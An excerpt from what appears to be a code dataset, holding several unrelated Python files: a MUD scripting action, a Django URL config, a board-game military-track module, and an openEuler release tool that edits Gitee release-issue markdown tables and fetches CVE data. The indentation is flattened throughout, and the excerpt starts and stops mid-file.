# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant l'action changer_prix."""
from primaires.scripting.action import Action
from primaires.scripting.instruction import ErreurExecution
class ClasseAction(Action):
"""Change le prix de l'objet ou de son prototype."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.changer_prix, "Objet", "Fraction")
cls.ajouter_types(cls.changer_prix, "PrototypeObjet", "Fraction")
@staticmethod
def changer_prix(prototype_ou_objet, prix):
"""Change le prix de l'objet ou du prototype précisé.
Le prix modifié est à donner en valeur 1 (la plus petite
monnaie disponible). Il s'agit donc d'une modification
dans la même unité que dans l'éditeur d'objet 'oedit'.
Paramètres à préciser :
* prototype_ou_objet : l'objet dont on veut changer le prix
* prix : le nouveau prix
Exemple d'utilisation :
changer_prix objet 10
"""
prototype_ou_objet._prix = int(prix)
| 1.53125 | 2 |
bot/urls.py | GautamPanickar/PanikarsBot | 1 | 12789310 | <reponame>GautamPanickar/PanikarsBot
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^submit', views.submit, name='submit'),
]
# a dummy method for making db operations newboston video tutorial
#url(r'^(?P<message_id>[0-9]+)/$', views.details, name='details'),
| 1.820313 | 2 |
swd/military_track.py | dfomin/7wd-engine | 0 | 12789311 | <reponame>dfomin/7wd-engine
from typing import Callable, Optional
import numpy as np
from .states.military_state_track import MilitaryTrackState
class MilitaryTrack:
@staticmethod
def apply_shields(state: MilitaryTrackState,
player_index: int,
shields: int,
military_tokens_callback: Callable[[int, int], None]):
if player_index == 1:
shields = -shields
state.conflict_pawn = np.clip(state.conflict_pawn + shields, -9, 9)
if state.conflict_pawn >= 3 and state.military_tokens[2]:
state.military_tokens[2] = False
military_tokens_callback(1, -2)
if state.conflict_pawn >= 6 and state.military_tokens[3]:
state.military_tokens[3] = False
military_tokens_callback(1, -5)
if state.conflict_pawn <= -3 and state.military_tokens[1]:
state.military_tokens[1] = False
military_tokens_callback(0, -2)
if state.conflict_pawn <= -6 and state.military_tokens[0]:
state.military_tokens[0] = False
military_tokens_callback(0, -5)
@staticmethod
def military_supremacist(state: MilitaryTrackState) -> Optional[int]:
if state.conflict_pawn == 9:
return 0
elif state.conflict_pawn == -9:
return 1
return None
@staticmethod
def weaker_player(state: MilitaryTrackState) -> Optional[int]:
if state.conflict_pawn > 0:
return 1
elif state.conflict_pawn < 0:
return 0
return None
@staticmethod
def points(state: MilitaryTrackState, player_index: int) -> int:
if MilitaryTrack.military_supremacist(state) is not None:
return 0
if player_index == 0 and state.conflict_pawn <= 0 or player_index == 1 and state.conflict_pawn >= 0:
return 0
return [2, 5, 10][abs(state.conflict_pawn) // 3]
| 2.390625 | 2 |
release-assistant/javcra/application/modifypart/modifyentrance.py | openeuler-mirror/release-tools | 1 | 12789312 | #!/usr/bin/python3
# ******************************************************************************
# Copyright (c) Huawei Technologies Co., Ltd. 2020-2020. All rights reserved.
# licensed under the Mulan PSL v2.
# You can use this software according to the terms and conditions of the Mulan PSL v2.
# You may obtain a copy of Mulan PSL v2 at:
# http://license.coscl.org.cn/MulanPSL2
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v2 for more details.
# ******************************************************************************/
"""
Description: modify entrance
"""
import datetime
import json
import re
import requests
from retrying import retry
from javcra.api.gitee_api import Issue
from javcra.common.constant import REPO_BASE_URL, RELEASE_URL
from javcra.libs.log import logger
from javcra.libs.read_excel import download_file
class Operation(Issue):
"""
md operation for release issue description
"""
def init_md_table(self, t_head=None, body_info=None, block_title="", prefix="", suffix=""):
"""
initialize the md table of specific part like "CVE part" for release issue
Args:
t_head: table head. e.g.["CVE", "仓库", "status"]
body_info: table body
block_title: title of block. e.g: "## 1.CVE"
prefix: table prefix. e.g.: "修复cve xx 个"
suffix: characters between the end of the table and the next block.
Raises:
ValueError: The thead must be a list or tuple
Returns:
str: markdown table str
"""
if not t_head:
t_head = []
if not isinstance(t_head, (list, tuple)):
raise ValueError("The thead must be a list or tuple.")
thead_str = "|" + "|".join(t_head) + "|\n" + "|-" * len(t_head) + "|\n"
tbody_str = self.convert_md_table_format(t_head, body_info)
table_str = thead_str + tbody_str
if prefix:
table_str = prefix + "\n" + table_str
return "\n".join([block_title, table_str, suffix])
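    # Rough example of the generated markdown (illustrative values):
    #   init_md_table(["CVE", "仓库", "status"], [], "## 1、CVE", prefix="修复CVE 0个")
    #   -> "## 1、CVE\n修复CVE 0个\n|CVE|仓库|status|\n|-|-|-|\n\n"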
@staticmethod
def convert_md_table_format(table_head, issue_info):
"""
get markdown table body according to table_head and issue_info
Args:
table_head: table head like ["issue","status",...]
issue_info: issue info like [{"issue":...,"status":...},....]
Returns:
markdown table str
"""
if not issue_info:
issue_info = []
table_body_str = ""
for info in issue_info:
table_body_str += "|"
for word in table_head:
table_body_str += str(info.get(word)) + "|"
table_body_str += "\n"
return table_body_str
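    # Example (illustrative values): one issue dict rendered as a markdown row:
    #   convert_md_table_format(["issue", "仓库", "status"],
    #                           [{"issue": "#I41R53", "仓库": "krb5", "status": "已完成"}])
    #   -> "|#I41R53|krb5|已完成|\n"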
@staticmethod
def get_block_lines(issue_body_lines, start_flag, end_flag):
"""
get block lines of specific part from issue body lines
Args:
issue_body_lines: the lines of issue body
start_flag: start flag of specific part, like ""## 1、CVE""
end_flag: end flag of specific part, like "\n"
        Returns:
            block_lines: lines in specific part like "cve part"
            block_start_idx: start index of specific part
            block_end_idx: end index of specific part
"""
block_start_idx = 0
block_end_idx = 0
flag = 0
# get block lines
for idx, line in enumerate(issue_body_lines):
if not flag and line.startswith(start_flag):
# represents the start of block
flag = 1
block_start_idx = idx
continue
if flag and line == end_flag:
block_end_idx = idx
break
return issue_body_lines[block_start_idx:block_end_idx], block_start_idx, block_end_idx
@staticmethod
def modify_block_lines(origin_lines, block_lines, block_start, block_end):
"""
modify block lines for add or delete operation
Args:
origin_lines: list, issue body splitlines
block_lines: list, block str splitlines
block_start: start index of block
block_end: end index of block
Returns:
new lines for issue body, list
"""
# to get count and then modify str "修复CVE xxx个"
fix_line_idx = -1
count = 0
for index, cur_line in enumerate(block_lines):
# demo: 修复CVE xxx个
if cur_line.startswith("修复"):
fix_line_idx = index
# demo: |#I41R53:CVE-2021-36222|krb5|
if cur_line.startswith("|#"):
count += 1
if fix_line_idx != -1:
block_lines[fix_line_idx] = re.sub(
"\d+", str(count), block_lines[fix_line_idx]
)
# modify block lines
origin_lines[block_start:block_end] = block_lines
return origin_lines
@staticmethod
def __append_info_in_specific_block(append_info, block_lines):
"""
append info in specific block for add operation
Args:
append_info: issue info or requires info, dict
block_lines: lines of specific block
Returns:
block_lines: block lines after append
"""
for key, value in append_info.items():
# if the issue to be added is already in the table, then continue
if any([key in line for line in block_lines]):
logger.info("issue {} already exists in body content.".format(key))
continue
# if the requires info to be added already in the table, then not add
value_lines = value.splitlines(keepends=True)
append_value_lines = []
for line in value_lines:
if line not in block_lines:
append_value_lines.append(line)
value = "".join(append_value_lines)
block_lines.append(value)
return block_lines
@staticmethod
def __delete_issue_in_specific_block(delete_issue, block_lines):
"""
delete issue in specific block for delete operation
Args:
block_lines: lines of specific block
delete_issue: issue to delete
Returns:
block_lines: block lines after delete
"""
to_remove_idx = -1
for idx, block_line in enumerate(block_lines):
if delete_issue in block_line:
to_remove_idx = idx
break
if to_remove_idx != -1:
block_lines.pop(to_remove_idx)
else:
logger.info("The issue {} does not exist in release issue description."
"".format(delete_issue))
return block_lines
@staticmethod
def __update_info_in_specific_block(update_info, block_lines):
"""
update info in specific block for update operation
Args:
update_info: issue to update
block_lines: lines of specific block
Returns:
block_lines: new lines of specific block
"""
for issue_id, issue_content in update_info.items():
if not issue_content:
continue
for idx, ln in enumerate(block_lines):
if issue_id in ln:
block_lines[idx] = issue_content
break
return block_lines
def get_new_body_lines(self, old_issue_info, append_info=None, delete_info=None,
update_info=None, start_flag="", end_flag="\n"):
"""
generating a new issue body by add or delete or update operation
Args:
old_issue_info: old issue info
append_info: issues to add. like {issue_id:{"repo":..,"status":...},...}
delete_info: issues to delete.
update_info: issues to update.
start_flag: start flag of block
end_flag: end flag of block.
Raises:
ValueError:
append_info、 delete_info need at least one
Returns:
new body lines
"""
if not any((append_info, delete_info, update_info)):
raise ValueError("append_info or delete_info or update info need at least one")
issue_body_lines = old_issue_info.splitlines(keepends=True)
block_lines, block_start_idx, block_end_idx = self.get_block_lines(
issue_body_lines, start_flag, end_flag)
if append_info:
block_lines = self.__append_info_in_specific_block(append_info, block_lines)
elif delete_info:
block_lines = self.__delete_issue_in_specific_block(delete_info, block_lines)
else:
block_lines = self.__update_info_in_specific_block(update_info, block_lines)
final_lines = self.modify_block_lines(issue_body_lines, block_lines, block_start_idx,
block_end_idx)
return "".join(final_lines)
def create_jenkins_comment(self, jenkins_result):
"""method to create issue comment
Args:
jenkins_result: jenkins result
Returns:
comment_res: Success and failure in creating a comment
"""
for result in jenkins_result:
if not result.get("status"):
logger.error("failed to obtain jenkins_result")
return
th = ["name", "status", "output"]
comment = self.init_md_table(th, jenkins_result)
comment_res = self.create_issue_comment(comment)
if not comment_res:
logger.error("Failed to create Jenkins' comment message %s" % comment)
return
return comment_res
def add_for_specific_block(self, body_str, issues, table_head, block_name):
"""
add info in specific block
Args:
body_str: str, issue body
issues: issues to be add
table_head: list, table head
block_name: block name
Returns:
processed issue body str
"""
if not body_str:
raise ValueError("no content of release issue body, failed to add.")
issues_dict = dict()
issues_info_list = list()
# If the block is "requires", then get the md format str directly, like "|bluez|接口变更|"
if "requires" in block_name:
requires_md_str = self.convert_md_table_format(table_head, issues)
if requires_md_str:
issues_info_list.append(requires_md_str)
issues_dict = {"requires_str": requires_md_str}
else:
# for other blocks, get detail issue info according to each issue id, then get the md format str
# like "|#I41R53:CVE-2021-36222|krb5|已完成|7.5|1.18.2|否|"
for issue_id in issues:
single_issue_info = self.get_single_issue_info(issue_id, block_name)
if single_issue_info:
issues_info_list.append(single_issue_info)
issue_info = self.convert_md_table_format(table_head, single_issue_info)
issues_dict.setdefault(issue_id, issue_info)
# if all the info to be add are empty
if not issues_info_list:
raise ValueError("failed to add, please check whether the issues to be added exists.")
return self.get_new_body_lines(
body_str, append_info=issues_dict, start_flag=block_name, end_flag="\n"
)
def delete_for_specific_block(self, body_str, issues, block_name):
"""
delete info in specific block
Args:
body_str: str, issue body
issues: issues to be delete
block_name:block name
Returns:
processed issue body str
"""
if not body_str:
raise ValueError("no content of release issue body, failed to delete.")
res_str = body_str
# delete each issue and then get new issue body lines
for issue_id in issues:
res_str = self.get_new_body_lines(
res_str, delete_info=issue_id, start_flag=block_name, end_flag="\n"
)
return res_str
@staticmethod
def __get_score(body_str):
"""
get the score of cve
Args:
body_str: cve issue body str
Returns:
str: score value or no score
"""
# to match openEuler评分 for cve
euler_score_pattern = re.compile("openEuler评分.*?(?P<euler_score>[0-9\.]+)", flags=re.S)
euler_res = euler_score_pattern.search(body_str)
if euler_res:
return euler_res["euler_score"]
else:
# to match BaseScore for cve
base_score_pattern = re.compile("BaseScore[::](?P<base_score>[0-9\.]+)")
base_score = base_score_pattern.search(body_str)
return base_score["base_score"] if base_score else "no score info"
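    # Example (illustrative): for an issue body containing "openEuler评分: 7.5" the
    # first pattern matches and this returns "7.5"; if neither pattern matches it
    # falls back to "no score info".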
def __is_abi_change(self, body_str):
"""
Parsing whether the abi has changed
Args:
body_str: cve issue body
Returns:
"是" or "否"
"""
# to match whether the abi has changed of specific branch
abi_content_pattern = re.compile("修复是否涉及abi变化.*?(?P<abi>.*)[\\n$]", flags=re.S)
abi_res = abi_content_pattern.search(body_str)
if not abi_res:
logger.error("The abi pattern did not match the info")
return "否"
abi_info = abi_res["abi"]
branch = self.get_update_issue_branch()
if not branch:
return "否"
for line in abi_info.splitlines():
if branch in line and "是" in line:
return "是"
return "否"
def get_single_issue_info(self, issue_id, block_name):
"""
get singe issue info for specific block
Args:
block_name: name of block
issue_id: issue id
Returns:
list: issue info list
"""
issue_content = self.get_issue_info(issue_number=issue_id)
if not issue_content:
logger.error("can not get the content of issue {}, perhaps this issue does not exist.".format(issue_id))
return []
repository = issue_content.get("repository", {})
# for all the block, get the dict of repository and status for the issue
issue_info = {
"仓库": repository.get("name", "无仓库信息"),
"status": issue_content.get("issue_state", "无状态信息")
}
block_names_list = ["## 2、bugfix", "# 3、安装、自编译问题", "# 4、遗留问题"]
if block_name in block_names_list:
issue_info["issue"] = "#" + issue_id
if "遗留" in block_name:
issue_info["type"] = issue_content.get("issue_type", "无type信息")
issue_info["status"] = "遗留"
elif "CVE" in block_name:
issue_body = self.get_issue_body(issue_id)
if not issue_body:
logger.error("empty issue body for {}, can not get the info for {} block.".format(issue_id, block_name))
return []
version_pattern = re.compile("漏洞归属的版本[::](?P<version>.*)")
version = version_pattern.search(issue_body)
issue_info["CVE"] = "#" + issue_id
issue_info["score"] = self.__get_score(issue_body)
issue_info["version"] = version["version"] if version else "no version info"
issue_info["abi是否变化"] = self.__is_abi_change(issue_body)
return [issue_info]
def update_for_specific_block(self, body_str, issues, table_head, block_name):
"""
Update specific table modules
Args:
body_str: body info
issues: list of issue numbers
table_head: table head
block_name: block name
Returns:
get_new_body_lines: The new issue of body
"""
if not body_str:
raise ValueError("no content of release issue, failed to update")
to_update = {}
for issue_id in issues:
# latest issue status
single_issue_info = self.get_single_issue_info(issue_id, block_name)
to_update.setdefault(
issue_id, self.convert_md_table_format(table_head, single_issue_info)
)
return self.get_new_body_lines(
body_str, update_info=to_update, start_flag=block_name, end_flag="\n"
)
def operate_for_specific_block(self, table_head, block_name, table_body=None, prefix="", operate="init",
body_str=None, issues=None):
"""
Process init, add, delete operations for specific block
Args:
table_head: list, table head
block_name: str, block name like ""## 1、CVE""
table_body: table_body of specific part for init, like [{..},{..},..].
prefix: prefix of block, like "修复了bugfix xxx个"
operate: init, add, delete
body_str: issue body, str
issues: issue id, list
Raises:
ValueError: not allowed operate
Returns:
processed release issue body str
"""
if not table_body:
table_body = []
if operate == "init":
return self.init_md_table(table_head, table_body, block_name, prefix)
elif operate == "add":
return self.add_for_specific_block(body_str, issues, table_head, block_name)
elif operate == "delete":
return self.delete_for_specific_block(body_str, issues, block_name)
elif operate == "update":
return self.update_for_specific_block(body_str, issues, table_head, block_name)
else:
raise ValueError(
"not allowed 'operate' value,expected in ['init','add','delete','update'],but given {}".format(operate)
)
def init(self, *args):
"""
init specific block
Returns:
init str
"""
return self.get_new_issue_body(operate="init", *args)
def get_new_issue_body(self, *args, operate="init", body_str=None, issues=None):
raise NotImplementedError
class CveIssue(Operation):
"""
operation CVE in issue
"""
def __init__(self, repo, token, issue_num):
super().__init__(repo, token, issue_num)
def create_cve_list(self, user_email):
"""
The CVE-Manager is triggered to generate the CVE list and archive it
Args:
user_email (str): gitee user email
"""
# Take cve within three months
start_time = (datetime.datetime.now() + datetime.timedelta(days=-90)).strftime('%Y-%m-%d')
email_name = user_email.split('@')[0]
url = "https://api.openeuler.org/cve-manager/v1/download/excel/triggerCveData?startTime=" + \
start_time + "&typeName=" + email_name
try:
response = requests.get(url, headers=self.headers)
if response.status_code == 200 and "a task being processed" in response.text:
logger.info("The CVE-Manager is triggered to generate the CVE list and archive the CVE list")
return True
logger.error("The CVE List file fails to be archived,"
"The response status code is %s,"
"the response body is %s" % (response.status_code, response.text))
return False
except (requests.RequestException, AttributeError) as error:
logger.error("The CVE List file fails to be archived because %s " % error)
return False
def get_cve_list(self, *args):
"""
Obtain cVE-related information provided by the CVE-Manager.
Returns:
cve_list: Data in Excel in dictionary form
"""
user_email, obs_ak, obs_sk = args
# trigger cve_manger to archive
resp = self.create_cve_list(user_email)
if not resp:
raise ValueError("trigger cve-manege archive failure")
@retry(stop_max_attempt_number=5, wait_fixed=60000)
def get_list():
"""
Get archived files
Returns:
cve_list: document content
"""
now_time = datetime.date(
datetime.date.today().year,
datetime.date.today().month,
datetime.date.today().day,
).strftime("%Y-%m-%d")
branch_name = self.get_update_issue_branch()
if not branch_name:
logger.error("Failed to obtain branch")
return []
cve_list = download_file(
now_time, "{}_updateinfo.xlsx".format(branch_name), obs_ak, obs_sk
)
if not cve_list:
logger.error("Failed to obtain CVE data")
raise ValueError("Failed to obtain CVE data")
return cve_list
cve_list = get_list()
return cve_list
def get_new_issue_body(self, *args, operate="init", body_str=None, issues=None):
"""
get new issue body for cve block operation
Args:
operate: operate str. Defaults to "init".expected [init,add,delete]
body_str: gitee issue body str.
issues: issue id list.
Returns:
new issue body str
"""
if not issues:
issues = []
t_head = ["CVE", "仓库", "status", "score", "version", "abi是否变化"]
block_name = "## 1、CVE"
logger.info("Start to obtain cve archive information, it may take a few minutes.")
cve_list = [] if operate != "init" else self.get_cve_list(*args)
cve_prefix = "修复CVE {}个".format(len(cve_list))
return self.operate_for_specific_block(t_head, block_name, prefix=cve_prefix, operate=operate,
table_body=cve_list, body_str=body_str, issues=issues)
class BugFixIssue(Operation):
def __init__(self, repo, token, issue_num):
super().__init__(repo, token, issue_num)
def get_new_issue_body(self, *args, operate="init", body_str=None, issues=None):
"""
get new issue body for bugfix block operation
Args:
operate: operate str. Defaults to "init".expected [init,add,delete]
body_str: gitee issue body str.
issues: issue id list.
Returns:
str: new issue body str
"""
if not issues:
issues = []
table_head = ["issue", "仓库", "status"]
block_name = "## 2、bugfix"
bugfix_list = []
bugfix_prefix = "修复bugfix {}个".format(len(bugfix_list))
return self.operate_for_specific_block(
table_head,
block_name,
prefix=bugfix_prefix,
operate=operate,
table_body=bugfix_list,
body_str=body_str,
issues=issues,
)
class RequiresIssue(Operation):
def __init__(self, repo, token, issue_num):
super().__init__(repo, token, issue_num)
@staticmethod
def get_requires_list():
"""
get requires list
Returns:
requires list, like [{"仓库":..., "引入原因":...},...]
"""
# since the code that generates pkg requires is not in the repository,
# so it is assumed that the return value is []
return []
def get_new_issue_body(self, *args, operate="init", body_str=None, issues=None):
"""
get new issue body for requires block operation
Args:
            operate: operate str. Defaults to "init". Expected values: [init, add, delete]
body_str: gitee issue body str.
issues: issue list
Returns:
new issue body str
"""
t_head = ["仓库", "引入原因"]
block_name = "## 3、requires"
if operate not in ["init", "add"]:
raise ValueError("requires block operation only allowed in ['init', 'add'].")
issues = self.get_requires_list()
return self.operate_for_specific_block(
t_head, block_name, operate=operate, body_str=body_str, issues=issues
)
class InstallBuildIssue(Operation):
def __init__(self, repo, token, issue_num):
super().__init__(repo, token, issue_num)
def get_new_issue_body(self, *args, operate="init", body_str=None, issues=None):
"""
get new issue body for install build block operation
Args:
            operate: operate str. Expected values: [init, add, delete]
body_str: gitee issue body str.
issues: issue id list.
Returns:
new issue body str
"""
table_head = ["issue", "仓库", "status"]
block_name = "# 3、安装、自编译问题"
return self.operate_for_specific_block(
table_head,
block_name,
operate=operate,
body_str=body_str,
issues=issues
)
class RemainIssue(Operation):
def __init__(self, repo, token, issue_num):
super().__init__(repo, token, issue_num)
def get_new_issue_body(self, *args, operate="init", body_str=None, issues=None):
"""
get new issue body for remain block operation
Args:
            operate: operate str. Expected values: [init, add, delete]
body_str: gitee issue body str.
issues: issue id list.
Returns:
str: new issue body str
"""
t_header = ["issue", "仓库", "status", "type"]
block_name = "# 4、遗留问题"
return self.operate_for_specific_block(
t_header,
block_name,
operate=operate,
body_str=body_str,
issues=issues
)
class IssueOperation(Operation):
def __init__(self, repo, token, issue_num):
super().__init__(repo, token, issue_num)
args = (repo, token, issue_num)
self.cve_object = CveIssue(*args)
self.bugfix_object = BugFixIssue(*args)
self.requires_object = RequiresIssue(*args)
self.install_build_object = InstallBuildIssue(*args)
self.remain_object = RemainIssue(*args)
def init_repo_table(self):
"""
init repo table
return:
md table str
"""
block_name = "# 2、测试repo源"
table_head = ["repo_type", "url"]
table_str = self.init_md_table(table_head)
return block_name + table_str
def create_install_build_issue(self, failed_type, pkg_name, log_data):
"""
create issue when install failed or build failed
Args:
failed_type: install failed or build failed
pkg_name: package name
log_data: Compilation log information
return:
issue_id
"""
branch = self.get_update_issue_branch()
if not branch:
logger.error("failed to create install build issue because the release issue branch not found.")
return None
release_time = self.get_release_time()
if not release_time:
logger.error("failed to create install build issue because the release time not found.")
return None
params = {
"repo": pkg_name,
"owner": self.owner,
"access_token": self.token,
"title": "[{brh}] {pkg} {verify_type} failed {release_date}".format(pkg=pkg_name, verify_type=failed_type,
brh=branch, release_date=release_time)
}
command = ""
if failed_type == "build":
command = "rpmbuild --rebuild"
elif failed_type == "install":
command = "yum install"
params["body"] = """Branch: {brh}
Component: {pkg}
Instructions to reappear the problem : {command}
Expected results: successfully {_type}
Actual results: failed to {_type}
<b>Partial failure log:</b>
<P>
{log_data}
""".format(brh=branch, pkg=pkg_name, command=command,
_type=failed_type, log_data=log_data)
issue_id = self.create_issue(params)
return issue_id
def get_update_version_info(self):
"""
Get update target and personnel information
Returns:
update version info
"""
issue_body = self.get_issue_body(self.issue_num)
if issue_body:
if re.compile("1、CVE.*?\\n\\n", re.S).search(issue_body):
logger.error("Issue has CVE content, maybe you already have operated start update command.")
return None
if "代码冻结" not in issue_body:
logger.error("the code freeze time is not in release issue body.")
return None
if not issue_body.endswith("\n"):
issue_body += "\n"
return issue_body
return None
def get_release_time(self):
"""
get the date for release
Returns:
release_date
"""
issue_body = self.get_issue_body(self.issue_num)
if not issue_body:
logger.error("no content of release issue body.")
return None
date_info = re.compile("(?P<release_date>代码冻结.*?\\n\\n)", re.S).search(issue_body)
if not date_info:
logger.error("the code freeze time is not in release issue body.")
return None
split_date_info = re.split(r":|:", date_info["release_date"].strip())
try:
release_date = split_date_info[1].strip()
# The length of the date including year, month, and day is 8
if release_date.isdigit() and len(release_date) == 8:
return release_date
logger.error("The format of the code freeze date: %s does not meet the requirements." % release_date)
return None
except IndexError:
logger.error("error in getting code freeze date.")
return None
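    # Hedged illustration (the sample issue text below is invented): if the release
    # issue body contains a line such as "代码冻结时间:20211230" followed by a blank
    # line, get_release_time() returns the 8-digit string "20211230"; anything that
    # is not an 8-digit date in that position is rejected and None is returned.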
def get_repo(self, md_type=True):
"""
        get repo according to branch, date and epol
"""
branch = self.get_update_issue_branch()
if not branch:
raise ValueError("can not get the branch, please check.")
release_date = self.get_release_time()
if not release_date:
raise ValueError("can not get the release time, please check.")
base_url = REPO_BASE_URL + branch
repos = []
repo_dict = {
"repo_type": "standard",
"url": base_url + "/update_" + release_date + "/"
}
repos.append(repo_dict)
pkglist = self.get_update_list()
_, epol_list = self.get_standard_epol_list(branch, pkglist)
if epol_list:
repo_dict = dict()
repo_dict["repo_type"] = "epol"
if "sp2" in branch or "SP2" in branch:
repo_dict["url"] = base_url + "/EPOL/update_" + release_date + "/main/"
else:
repo_dict["url"] = base_url + "/EPOL/update_" + release_date + "/"
repos.append(repo_dict)
if md_type:
t_header = ["repo_type", "url"]
block_name = "# 2、测试repo源"
return self.init_md_table(t_head=t_header, body_info=repos, block_title=block_name)
return repos
@staticmethod
def _process_issue_id(body):
"""
Process the MD string to get the issue ID
Args:
body (str): block body
Returns:
            list: issue ids referenced in the current block
"""
content = re.compile("#[a-zA-Z0-9]+", re.S).findall(body)
if not content:
return content
return [con.replace("#", "") for con in content]
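    # Hedged usage sketch (the markdown row below is made up for illustration):
    # a block body such as "| #I4ABCD | some-repo | 已完成 |" yields ["I4ABCD"],
    # i.e. every "#<id>" token with the leading "#" stripped.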
def _get_install_build_bugfix_issue_id(self, issue_body):
"""
Gets the corresponding block element with regular,
Args
issue_body: issue body str
Returns:
issue number: issue number list
"""
def update_set(res_obj):
# Call the _process_issue_id function to return the issue number
res_set = set()
issue_list = self._process_issue_id(res_obj)
res_set.update(issue_list)
return res_set
def update_res(issue_res, choice):
# If this table object exists,
# the final issue is fetched based on the selection
issues = set()
if issue_res:
issues = update_set(issue_res[choice])
return issues
# Installs the compiled table information object
install_build_res = re.compile("(?P<install_build>3、安装、自编译问题.*?\\n\\n)",
re.S).search(issue_body)
# Table information object for bugfix
bugfix_res = re.compile("(?P<bugfix>2、bugfix.*?\\n\\n)", re.S).search(issue_body)
# cve table information object
cve_res = re.compile("(?P<cve>1、CVE.*?\\n\\n)", re.S).search(issue_body)
install_build_issues = update_res(install_build_res, "install_build")
bugfix_issues = update_res(bugfix_res, "bugfix")
cve_issues = update_res(cve_res, "cve")
if not all([install_build_issues, bugfix_issues, cve_issues]):
logger.info("Block has no related issues install_build_issues:%s, "
"bugfix_issues: %s,cve_issues: %s " % (install_build_issues, bugfix_issues, cve_issues))
return list(install_build_issues), list(bugfix_issues), list(cve_issues)
def update_remain_issue_state(self, issue_list, action):
"""
Change the issue in bugfix and cve according to
whether the command is left
Args:
issue_list: issues
action: add or delete
Returns:
True or False
"""
try:
if action not in ["add", "delete"]:
raise ValueError("action parameter errors must be in add and delete")
issue_body = self.get_issue_body(self.issue_num)
if not issue_body:
raise ValueError("failed to obtain the issue description")
_, bugfix_issues, cve_issue = self._get_install_build_bugfix_issue_id(issue_body)
to_update = {}
not_exist_issues = []
for issue in issue_list:
if issue not in bugfix_issues and issue not in cve_issue:
not_exist_issues.append(issue)
logger.warning("issue %s not exist in cve and bugfix part" % issue)
continue
if issue in bugfix_issues:
t_head = ["issue", "仓库", "status"]
operate_ins = getattr(self, "bugfix" + "_object")
block_name = '## 2、bugfix'
new_con = operate_ins.get_single_issue_info(issue, block_name)[0]
else:
t_head = ["CVE", "仓库", "status", "score", "version", "abi是否变化"]
operate_ins = getattr(self, "cve" + "_object")
block_name = '## 1、CVE'
new_con = operate_ins.get_single_issue_info(issue, block_name)[0]
if action == "add":
new_con["status"] = "遗留"
to_update.setdefault(
issue, self.convert_md_table_format(t_head, [new_con])
)
body_str = self.get_new_body_lines(
issue_body, update_info=to_update, start_flag=block_name, end_flag="\n"
)
res = self.update_issue(body=body_str)
if not res:
raise ValueError("failed to %s action issue status,issue is %s" % (action, issue))
except (ValueError, AttributeError, IndexError, TypeError, KeyError) as error:
logger.error("In the %s operation, the reasons for the error are as follows: %s" % (action, error))
return False
if issue_list == not_exist_issues:
return False
return True
def get_remain_issues(self):
"""
get issues in remain block
Returns:
remain issues
"""
issue_body = self.get_issue_body(self.issue_num)
if not issue_body:
logger.error("empty body of release issue.")
return []
remain_res = re.compile("(?P<remain>4、遗留问题.*?\\n\\n)", re.S).search(issue_body)
if not remain_res:
logger.error("can not find remain issues label in release issue.")
return []
remain_issues = self._process_issue_id(remain_res["remain"])
if not remain_issues:
logger.info("can not find any remain issues in release issue.")
return list(set(remain_issues))
def get_remain_packages(self):
"""
get packages in remain block
Returns:
remain package list
"""
remain_issues = self.get_remain_issues()
remain_pkgs = []
for issue_number in remain_issues:
issue_content = self.get_issue_info(issue_number=issue_number)
if not issue_content:
                logger.error("can not get the content of issue %s, perhaps this issue does not exist." % issue_number)
continue
repository = issue_content.get("repository", {})
if repository.get("name"):
remain_pkgs.append(repository.get("name"))
return list(set(remain_pkgs))
def check_issue_state(self):
"""
Check the issue status under the bugfix and install_build headers
Returns:
True: update the status of the issue to the latest status successfully
False: failed to update the status of the issue to the latest status
"""
try:
body = self.get_issue_body(self.issue_num)
if not body:
raise ValueError("failed to get issue description information")
# get the bugfix and the issue number under the install_build and cve table headers
install_build_issues, bugfix_issues, _ = self._get_install_build_bugfix_issue_id(body)
remain_issues = self.get_remain_issues()
if install_build_issues:
install_build_issues = [issue for issue in install_build_issues if issue not in remain_issues]
self.operate_release_issue(operation="update", operate_block="install_build",
issues=install_build_issues)
if bugfix_issues:
bugfix_issues = [issue for issue in bugfix_issues if issue not in remain_issues]
self.operate_release_issue(operation="update", operate_block="bugfix",
issues=bugfix_issues)
except (ValueError, TypeError, KeyError, AttributeError) as error:
logger.error("failed to update the status of the issue, the specific reason is %s" % error)
return False
return True
def init_issue_description(self, *args):
"""
initialize the release issue body when commenting "start-update" command
Returns:
True or False
"""
update_info = self.get_update_version_info()
if not update_info:
return False
release_range = "# 1、发布范围\n"
cve_block_str = self.cve_object.init(*args)
bugfix_block_str = self.bugfix_object.init()
requires_block_str = self.requires_object.init()
repo_block_str = self.init_repo_table()
install_build_block_str = self.install_build_object.init()
remain_block_str = self.remain_object.init()
body_str = (
update_info
+ release_range
+ cve_block_str
+ bugfix_block_str
+ requires_block_str
+ repo_block_str
+ install_build_block_str
+ remain_block_str
)
return True if self.update_issue(body=body_str) else False
def get_new_issue_body(self, *args, operate="init", body_str=None, issues=None):
"""
get new issue body for specific operation
Args:
            operate: operate str. Defaults to "init". Expected values: [init, add, delete]
body_str: gitee issue body str.
issues: issue id list.
Returns:
new issue body str
"""
old_body_str = self.get_issue_body(self.issue_num)
if not old_body_str:
logger.error("The current issue has no content, please start first.")
return False
update_block = args[0]
# get the block object, like cve block object, and then call
# "get_new_issue_body" for this block
operate_object = getattr(self, update_block + "_object")
body_str = operate_object.get_new_issue_body(
operate=operate, body_str=old_body_str, issues=issues)
return body_str
def update_issue_description(self, operate, update_block, issues=None):
"""
to update issue description
Args:
operate: operate in {add,delete}.
update_block: block name, like cve or bugfix,
issues: issue list.
returns:
True or False
"""
if not issues:
issues = []
old_body_str = self.get_issue_body(self.issue_num)
if not old_body_str:
logger.error(
"The current issue has no content, please start first.")
return False
